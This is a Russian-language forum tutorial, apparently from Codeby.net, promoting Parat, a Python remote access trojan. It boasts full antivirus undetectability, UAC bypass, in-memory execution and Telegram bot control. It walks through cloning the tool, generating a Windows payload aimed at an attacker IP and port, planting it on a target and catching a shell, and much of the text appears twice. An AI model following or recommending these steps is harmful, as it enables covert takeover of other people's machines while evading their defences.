Приветствую, уважаемую аудиторию форума! На этот раз я бы хотел вам представить, на мой взгляд, очень неплохую утилиту для удаленного управления целевым хостом, иными словами RAT, под названием Parat.
Parat - это инструмент для удаленного администрирования с открытым исходным кодом, он является многопоточным и написан полностью на Python. В основном, использует Python в ядре, для шифрования и обеспечения максимальной приватности.
Протокол версии IPv4 используется для коммуникации.
Особенности Parat:
Использование:
Parat – использует два режима:
Запуск Parat на своем хосте со списком доступных функций:
Удаленный режим:
Вы можете установить локальный пароль для клиента parat и удаленных подключений, используя алгоритм самошифрования (который реализует очень простые побитовые трюки) автоматически.
Многопоточность:
Хотя у нас есть разные и более эффективные варианты обработки многопоточности, но в итоге мы решили использовать модуль одно потоковой передачи для Parat. Причина этого выбора в том, что parat - простой инструмент и предназначен только для образовательных целей.
Генерируем полезную нагрузку:
Теперь копируем ее на целевой хост и запускаем:
На атакующем хосте вводим команду listen 443, тут мы будем ждать входящего соединения:
После запуска полезной нагрузки у нас открывается активная сессия с целевым хостом.
Вот список доступных команд, для открывшегося шелла:
Мною были проверены все команды на Windows 8.1 Full Update – все работает корректно.
В заголовке темы присутствует слово Telegram, и не просто так. Попробуем осуществить управление сервером с помощью телеграм бота.
Открываем файл – telegram.service и вписываем API своего бота:
Сохраняем и запускаем командой:
По сути, большого преимущества это не дает, так как команд немного, одна из полезных, на мой взгляд, это генерация полезной нагрузки, и скачивание ее себе на устройство.
Ниже список команд, поддерживаемых в telegram:
На этом все, спасибо за внимание.
Специально для Codeby.net.
Parat - это инструмент для удаленного администрирования с открытым исходным кодом, он является многопоточным и написан полностью на Python. В основном, использует Python в ядре, для шифрования и обеспечения максимальной приватности.
Протокол версии IPv4 используется для коммуникации.
Особенности Parat:
- Полностью UnDetectable (FUD)
- Совместимость с Telegram messanger
- Обход контроля учётных записей пользователей (User Account Control, UAC)
- Выполнение в памяти
- Никаких требований по настройке
Код:
git clone https://github.com/micle-fm/ParatИспользование:
Parat – использует два режима:
- Локальный режим
- Удаленный режим
Запуск Parat на своем хосте со списком доступных функций:
- cd Parat
- chmod +x main.py
- Контроль локальных параметров
- Смена параметров пользовательского интерфейса
- Внесение изменений
- Использование своей UNIX – оболочки
- Настройка прослушивающихся портов
- Генерация полезных нагрузок
Удаленный режим:
- Удаленным режимом - называется режим взаимодействия вашего хоста с целевым, где на данный момент выполняется ваша полезная нагрузка. С помощью идентификатора сессий, вы подключаетесь к нужной, и получаете полный контроль над целевым хостом.
Вы можете установить локальный пароль для клиента parat и удаленных подключений, используя алгоритм самошифрования (который реализует очень простые побитовые трюки) автоматически.
Многопоточность:
Хотя у нас есть разные и более эффективные варианты обработки многопоточности, но в итоге мы решили использовать модуль одно потоковой передачи для Parat. Причина этого выбора в том, что parat - простой инструмент и предназначен только для образовательных целей.
Генерируем полезную нагрузку:
Код:
generate –i 192.168.125.140 –p 443 --platform windows --arch x64 –o shell –d /rootТеперь копируем ее на целевой хост и запускаем:
На атакующем хосте вводим команду listen 443, тут мы будем ждать входящего соединения:
После запуска полезной нагрузки у нас открывается активная сессия с целевым хостом.
Вот список доступных команд, для открывшегося шелла:
Мною были проверены все команды на Windows 8.1 Full Update – все работает корректно.
- Хочу уточнить, что на целевом хосте должен быть установлен Python 2.x
В заголовке темы присутствует слово Telegram, и не просто так. Попробуем осуществить управление сервером с помощью телеграм бота.
Открываем файл – telegram.service и вписываем API своего бота:
Код:
nano /Pentest/Parat/telegram.serviceСохраняем и запускаем командой:
Код:
python telegram.serviceПо сути, большого преимущества это не дает, так как команд немного, одна из полезных, на мой взгляд, это генерация полезной нагрузки, и скачивание ее себе на устройство.
Ниже список команд, поддерживаемых в telegram:
На этом все, спасибо за внимание.
Специально для Codeby.net.
